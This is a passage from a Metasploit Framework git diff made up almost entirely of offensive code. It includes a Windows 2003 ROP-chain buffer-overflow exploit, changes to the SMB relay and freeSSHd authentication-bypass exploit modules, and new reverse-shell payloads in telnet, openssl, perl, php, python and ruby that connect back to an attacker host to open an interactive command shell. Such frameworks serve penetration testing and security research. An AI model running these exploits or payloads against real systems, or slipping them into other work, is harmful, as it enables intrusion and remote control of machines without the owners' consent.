+ :callback_rop => :w2003_sp2_rop
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 09 2013'))
+
+ register_options([Opt::RPORT(6661)], self.class)
+ end
+
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V")[0].to_i
+ end
+
+ def nop
+ return make_nops(4).unpack("V")[0].to_i
+ end
+
+ def w2003_sp2_rop
+ rop_gadgets =
+ [
+ 0x77bc5d88, # POP EAX # RETN
+ 0x77ba1114, # <- *&VirtualProtect()
+ 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77bb0c86, # XCHG EAX,ESI # RETN
+ 0x77bc9801, # POP EBP # RETN
+ 0x77be2265, # ptr to 'push esp # ret'
+ 0x77bc5d88, # POP EAX # RETN
+ 0x03C0990F,
+ 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
+ 0x77bb48d3, # POP EBX, RET
+ 0x77bf21e0, # .data
+ 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
+ 0x77bbfc02, # POP ECX # RETN
+ 0x77bef001, # W pointer (lpOldProtect) (-> ecx)
+ 0x77bd8c04, # POP EDI # RETN
+ 0x77bd8c05, # ROP NOP (-> edi)
+ 0x77bc5d88, # POP EAX # RETN
+ 0x03c0984f,
+ 0x77bdd441, # SUB EAX, 03c0940f
+ 0x77bb8285, # XCHG EAX,EDX # RETN
+ 0x77bc5d88, # POP EAX # RETN
+ nop,
+ 0x77be6591, # PUSHAD # ADD AL,0EF # RETN
+ ].pack("V*")
+
+ return rop_gadgets
+ end
+
+ def exploit
+
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << [target.ret].pack("V")
+ sploit << [target['FakeObject']].pack("V")
+ sploit << [target['FakeObject']].pack("V")
+ if target[:callback_rop] and self.respond_to?(target[:callback_rop])
+ sploit << self.send(target[:callback_rop])
+ else
+ sploit << [target['JmpESP']].pack("V")
+ end
+ sploit << payload.encoded
+
+ random_filename = rand_text_alpha(4)
+ random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"
+ random_userid = rand_text_numeric(1)
+ random_username = rand_text_alpha_lower(5)
+ random_content = rand_text_alpha(10 + rand(10))
+
+ sch = "SCH 16\n"
+ sch << "cmdid: 1\n"
+ sch << "content-length: 0\n"
+ sch << "content-type: Appliction/Download\n"
+ sch << "filename: #{random_filename}.txt\n"
+ sch << "modified: #{random_date}\n"
+ sch << "pclassid: 102\n"
+ sch << "pobjid: 1\n"
+ sch << "rootid: 1\n"
+ sch << "sendcheck: 1\n"
+ sch << "source_cmdname: DUPF\n"
+ sch << "source_content-length: 116619\n"
+ sch << "userid: #{random_userid}\n"
+ sch << "username: #{sploit}\n\n"
+
+ print_status("Trying target #{target.name}...")
+
+ connect
+ print_status("Sending SCH request...")
+ sock.put(sch)
+ res = sock.get_once
+ if res.nil?
+ fail_with(Exploit::Failure::Unknown, "No response to the SCH request")
+ end
+ if res=~ /scmderid: \{(.*)\}/
+ scmderid = $1
+ else
+ fail_with(Exploit::Failure::UnexpectedReply, "scmderid value not found in the SCH response")
+ end
+
+ dupf = "DUPF 16\n"
+ dupf << "cmdid: 1\n"
+ dupf << "content-length: #{random_content.length}\n"
+ dupf << "content-type: Appliction/Download\n"
+ dupf << "filename: #{random_filename}.txt\n"
+ dupf << "modified: #{random_date}\n"
+ dupf << "pclassid: 102\n"
+ dupf << "pobjid: 1\n"
+ dupf << "rootid: 1\n"
+ dupf << "scmderid: {#{scmderid}}\n"
+ dupf << "sendcheck: 1\n"
+ dupf << "userid: #{random_userid}\n"
+ dupf << "username: #{random_username}\n\n"
+ dupf << random_content
+
+ print_status("Sending DUPF request...")
+ sock.put(dupf)
+ #sock.get_once
+ disconnect
+
+ end
+
+end
diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
index dfc48fc27d3b..135132c9b65e 100644
--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -72,9 +72,8 @@ def initialize(info={})
def check
tmp_rport = datastore['RPORT']
- uri = normalize_uri(target_uri.host)
datastore['RPORT'] = datastore['HTTPPORT']
- res = send_request_raw({'uri'=>uri})
+ res = send_request_raw({'uri'=>'/'}) #Check the base path for regex
datastore['RPORT'] = tmp_rport
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/
diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb
index 0bc45cb8a4f9..bbbcb2c34cbc 100644
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -94,7 +94,8 @@ module is not able to clean up after itself. The service and payload
register_options(
[
- OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"])
+ OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]),
+ OptString.new('SHARE', [ true, "The share to connect to", 'ADMIN$' ])
], self.class )
end
@@ -124,8 +125,8 @@ def smb_haxor(c)
return
end
- print_status("Connecting to the ADMIN$ share...")
- rclient.connect("ADMIN$")
+ print_status("Connecting to the defined share...")
+ rclient.connect(datastore['SHARE'])
@pwned[smb[:rhost]] = true
@@ -155,8 +156,8 @@ def smb_haxor(c)
print_status("Created \\#{filename}...")
- # Disconnect from the ADMIN$
- rclient.disconnect("ADMIN$")
+ # Disconnect from the SHARE
+ rclient.disconnect(datastore['SHARE'])
print_status("Connecting to the Service Control Manager...")
rclient.connect("IPC$")
@@ -295,7 +296,7 @@ def smb_haxor(c)
rclient.disconnect("IPC$")
print_status("Deleting \\#{filename}...")
- rclient.connect("ADMIN$")
+ rclient.connect(datastore['SHARE'])
rclient.delete("\\#{filename}")
end
diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb
index 1bf45ab16f90..8d057a4a7f5c 100644
--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -1,6 +1,12 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
require 'msf/core'
-require 'tempfile'
+
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@@ -42,9 +48,16 @@ def initialize(info={})
register_options(
[
- OptInt.new('RPORT', [false, 'The target port', 22]),
- OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
+ Opt::RPORT(22),
+ OptString.new('USERNAME', [false, 'A specific username to try']),
+ OptPath.new(
+ 'USER_FILE',
+ [ true, "File containing usernames, one per line",
+ # Defaults to unix_users.txt, because this is the closest one we can try
+ File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]
+ )
], self.class)
+
end
def load_netssh
@@ -60,9 +73,9 @@ def check
connect
banner = sock.recv(30)
disconnect
- if banner =~ /SSH-2.0-WeOnlyDo/
+ if banner =~ /SSH\-2\.0\-WeOnlyDo/
version=banner.split(" ")[1]
- return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
+ return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
@@ -85,9 +98,8 @@ def upload_payload(connection)
raise ArgumentError
end
cmds.each { |cmd|
- ret = connection.exec!("cmd.exe /c "+cmd)
+ connection.exec!("cmd.exe /c "+cmd)
}
-
end
def setup_ssh_options
@@ -103,7 +115,7 @@ def setup_ssh_options
end
def do_login(username,options)
- print_status("Trying username "+username)
+ print_status("Trying username '#{username}'")
options[:username]=username
transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
@@ -114,15 +126,36 @@ def do_login(username,options)
Timeout.timeout(10) do
connection.exec!('cmd.exe /c echo')
end
- rescue RuntimeError
+ rescue RuntimeError
return nil
- rescue Timeout::Error
+ rescue Timeout::Error
print_status("Timeout")
return nil
end
return connection
end
+ #
+ # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
+ # So we have to write our own each_user here.
+ #
+ def each_user(&block)
+ user_list = []
+ if datastore['USERNAME'] and !datastore['USERNAME'].empty?
+ user_list << datastore['USERNAME']
+ else
+ f = File.open(datastore['USER_FILE'], 'rb')
+ buf = f.read
+ f.close
+
+ user_list = (user_list | buf.split).uniq
+ end
+
+ user_list.each do |user|
+ block.call(user)
+ end
+ end
+
def exploit
#
# Load net/ssh so we can talk the SSH protocol
@@ -133,21 +166,22 @@ def exploit
return
end
- options=setup_ssh_options
+ options = setup_ssh_options
connection = nil
- usernames=datastore['USERNAMES'].split(' ')
- usernames.each { |username|
+ each_user do |username|
+ next if username.empty?
connection=do_login(username,options)
break if connection
- }
+ end
if connection
- print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
+ print_status("Uploading payload, this may take several minutes...")
upload_payload(connection)
handler
end
end
+
end
diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
new file mode 100644
index 000000000000..b675712c9aa0
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -0,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (telnet)',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ Creates an interactive shell via mknod and telnet.
+ This method works on Debian and other systems compiled
+ without /dev/tcp support. This module uses the '-z'
+ option included on some systems to encrypt using SSL.
+ },
+ 'Author' => 'RageLtMan',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd_bash',
+ 'RequiredCmd' => 'bash-tcp',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
+ cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+ end
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
new file mode 100644
index 000000000000..ab9c0c2a130f
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
@@ -0,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)',
+ 'Description' => 'Creates an interactive shell through two inbound connections',
+ 'Author' => 'hdm',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpDoubleSSL,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'openssl',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ cmd =
+ "sh -c '(sleep #{3600+rand(1024)}|" +
+ "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
+ "while : ; do sh && break; done 2>&1|" +
+ "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
+ " >/dev/null 2>&1 &)'"
+ return cmd
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
new file mode 100644
index 000000000000..96724f20e753
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -0,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via perl)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell via perl, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'perl',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ lhost = datastore['LHOST']
+ ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);"
+ cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");"
+ cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'"
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
new file mode 100644
index 000000000000..9892515e26a5
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -0,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell via php, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'php',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ lhost = datastore['LHOST']
+ ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
new file mode 100644
index 000000000000..a7e232d24b35
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -0,0 +1,79 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+ 'Author' => 'RageLtMan',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'python',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ cmd = ''
+ dead = Rex::Text.rand_text_alpha(2)
+ # Set up the socket
+ cmd += "import socket,subprocess,os,ssl\n"
+ cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+ cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+ cmd += "s=ssl.wrap_socket(so)\n"
+ # The actual IO
+ cmd += "#{dead}=False\n"
+ cmd += "while not #{dead}:\n"
+ cmd += "\tdata=s.recv(1024)\n"
+ cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+ cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+ cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+ cmd += "\ts.send(stdout_value)\n"
+
+ # The *nix shell wrapper to keep things clean
+ # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+ cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\""
+ cmd += ' >/dev/null 2>&1 &'
+ return cmd
+
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
new file mode 100644
index 000000000000..6743def9e98e
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -0,0 +1,49 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'ruby',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ def command_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
+ end
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
new file mode 100644
index 000000000000..593e69d71612
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -0,0 +1,67 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Double reverse TCP SSL (telnet)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
+ 'Author' => [
+ 'hdm', # Original module
+ 'RageLtMan', # SSL support
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpDoubleSSL,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'telnet',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ cmd =
+ "sh -c '(sleep #{3600+rand(1024)}|" +
+ "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
+ "while : ; do sh && break; done 2>&1|" +
+ "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+ " >/dev/null 2>&1 &)'"
+ return cmd
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb
index 37bb01b97d3a..837e089ef689 100644
--- a/modules/payloads/singles/cmd/windows/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -48,7 +48,7 @@ def command_string
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+ cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
end
end
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
new file mode 100644
index 000000000000..ca70b1087924
--- /dev/null
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -0,0 +1,77 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+ 'Author' => 'RageLtMan',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'python',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'python',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ cmd = ''
+ dead = Rex::Text.rand_text_alpha(2)
+ # Set up the socket
+ cmd += "import socket,subprocess,os,ssl\n"
+ cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+ cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+ cmd += "s=ssl.wrap_socket(so)\n"
+ # The actual IO
+ cmd += "#{dead}=False\n"
+ cmd += "while not #{dead}:\n"
+ cmd += "\tdata=s.recv(1024)\n"
+ cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+ cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+ cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+ cmd += "\ts.send(stdout_value)\n"
+
+ # The *nix shell wrapper to keep things clean
+ # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+ cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
+ return cmd
+
+ end
+
+end
diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb
index c7ccfff7b985..8a095ec25f89 100644
--- a/modules/payloads/singles/ruby/shell_bind_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb
@@ -6,6 +6,7 @@
##
require 'msf/core'
+require 'msf/core/payload/ruby'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@
module Metasploit3
include Msf::Payload::Single
+ include Msf::Payload::Ruby
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
@@ -31,7 +33,7 @@ def initialize(info = {})
end
def generate
- return super + ruby_string
+ return prepends(ruby_string)
end
def ruby_string
diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
index 2e3926ca37af..e0860b0074a7 100644
--- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
@@ -6,6 +6,7 @@
##
require 'msf/core'
+require 'msf/core/payload/ruby'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@
module Metasploit3
include Msf::Payload::Single
+ include Msf::Payload::Ruby
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
@@ -31,7 +33,7 @@ def initialize(info = {})
end
def generate
- return super + ruby_string
+ return prepends(ruby_string)
end
def ruby_string
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
index 0e149754cf5d..0bffe8832228 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -6,6 +6,7 @@
##
require 'msf/core'
+require 'msf/core/payload/ruby'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@
module Metasploit3
include Msf::Payload::Single
+ include Msf::Payload::Ruby
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
@@ -31,7 +33,7 @@ def initialize(info = {})
end
def generate
- return super + ruby_string
+ return prepends(ruby_string)
end
def ruby_string
